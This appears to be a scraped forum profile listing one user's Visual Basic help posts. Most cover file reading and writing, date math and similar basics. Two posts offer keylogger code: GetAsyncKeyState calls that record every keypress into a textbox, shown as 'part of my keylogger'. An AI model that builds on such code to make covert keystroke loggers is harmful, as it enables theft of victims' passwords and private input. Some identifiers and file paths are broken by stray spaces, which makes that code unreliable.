This code is a part of my keylogger. enjoy it!
[CODE=vb]If GetAsyncKeyStat e(vbKeyQ) = -32767 Then txtSpy.Text = txtSpy.Text & "q"
If GetAsyncKeyStat e(vbKeyW) = -32767 Then txtSpy.Text = txtSpy.Text & "w"
If GetAsyncKeyStat e(vbKeyE) = -32767 Then txtSpy.Text = txtSpy.Text & "e"
If GetAsyncKeyStat e(vbKeyR) = -32767 Then txtSpy.Text = txtSpy.Text & "r"
...
User Profile
Collapse
-
I think you wanna make a keylogger don't you??
any way use:
[CODE=vb]Private Declare Function GetAsyncKeyStat e Lib "user32" (ByVal vKey As Long) As Integer[/CODE]
then use:
[CODE=vb]If GetAsyncKeyStat e(vbKeyA) = -32767 Then text1.Text = text1.Text & "a"
If GetAsyncKeyStat e(vbKeyB) = -32767 Then text1.Text = text1.Text & "b"[/CODE] and ...
by this you can get any...Leave a comment:
-
Do you mean that store in RAM or in a File?!!
Storing in a file is easier than that one...Leave a comment:
-
you can open the TXT file as Binary. then you put it into multi part (string) this means you should work with new functions... after all you join them in a string.
if you make the
[CODE=vb]Textbox.Visible = False[/CODE]
it'll be faster. after it opened it make it visible. ;)
The fastest code is:
[CODE=vb]FileOpen(1, "C:\test.tx t", OpenMode.Input)
TextBox1.Text = InputString(1, FileLen("C:\tes t.txt"))...Leave a comment:
-
pureenhanoi made a good code. i think its enough. also you can see
http://www.thescripts.com/forum/thread659246.html ;)...Leave a comment:
-
pureenhanoi made a good code. i think its enough. also you can see
http://www.thescripts. com/forum/thread659246.ht ml ;)...Leave a comment:
-
this is easy:
1.click Run in Start then
2.Type:
Code:cmd /k defrag.exe /?
.:!M!LDEREMi:....Leave a comment:
-
+
these are good but I think "Month(Date )" can be used as a macro. so this makes it easyer.
;)Leave a comment:
-
VB is one of easiest programming languages but if you wanna make a game you should know that:
1. VC/C++ is faster and also is better for using probablitys.
2. VC/C++ load textors and bitmaps faster.
...
But generaly the speed depends on your algorithm and your ways. ;)...Leave a comment:
-
In this case you mean make a Search. this way is for begginers.
It's easy to export the objects' names and types ;)
1. Form:
[CODE=vb]Option Explicit
Private Type BrowseInfo
hWndOwner As Long
pIDLRoot As Long
pszDisplayName As String
lpszTitle As String
ulflags As Long
lpfnCallback As Long
lParam As Long
iImage As Long
...Leave a comment:
-
first make a TextBox for full date then you need a parsing code for exporting year of birth then calculate it:
[CODE=vb]Dim YearOfBirth as Integer
Text1.text = Year(Date) - YearOfBirth[/CODE]...Leave a comment:
-
Hi
if you wanna work multilanguage (VB6+PHP) I think the easiest way is:
- saving the page into htm or html
OR
- use IE activex
(by you know we can't export php commands from a web server) so then open the file into a string variable then attach your PHP commands to it.
also see http://www.thescripts.com/forum/thread659246.html...Leave a comment:
-
Hi
If you use RichTextBox there is a command that load the file in the easiest way and also a command for Replacement but if you wanna do it in the best way don't use it. The best way is opening file in Binary mode and get the data from file directly... in this way you won't need ActiveX of rich text box.
Also this way is the best way in VB.NET faster and easier than VB6....Leave a comment:
-
VB6: Open Command
Hi
This is my first reply
This way is one of old ways that VB6.0 got it from QBasic
I think the easy way is:
Open:
[CODE=vb] Dim s as String
Open "C:\test.tx t" For input As #1
Input #1, s
Close #1[/CODE]
Save:
[CODE=vb] Open "C:\test.tx t" For output As #1
Print #1, "Test"
...Leave a comment:
No activity results to display
Show More
Leave a comment: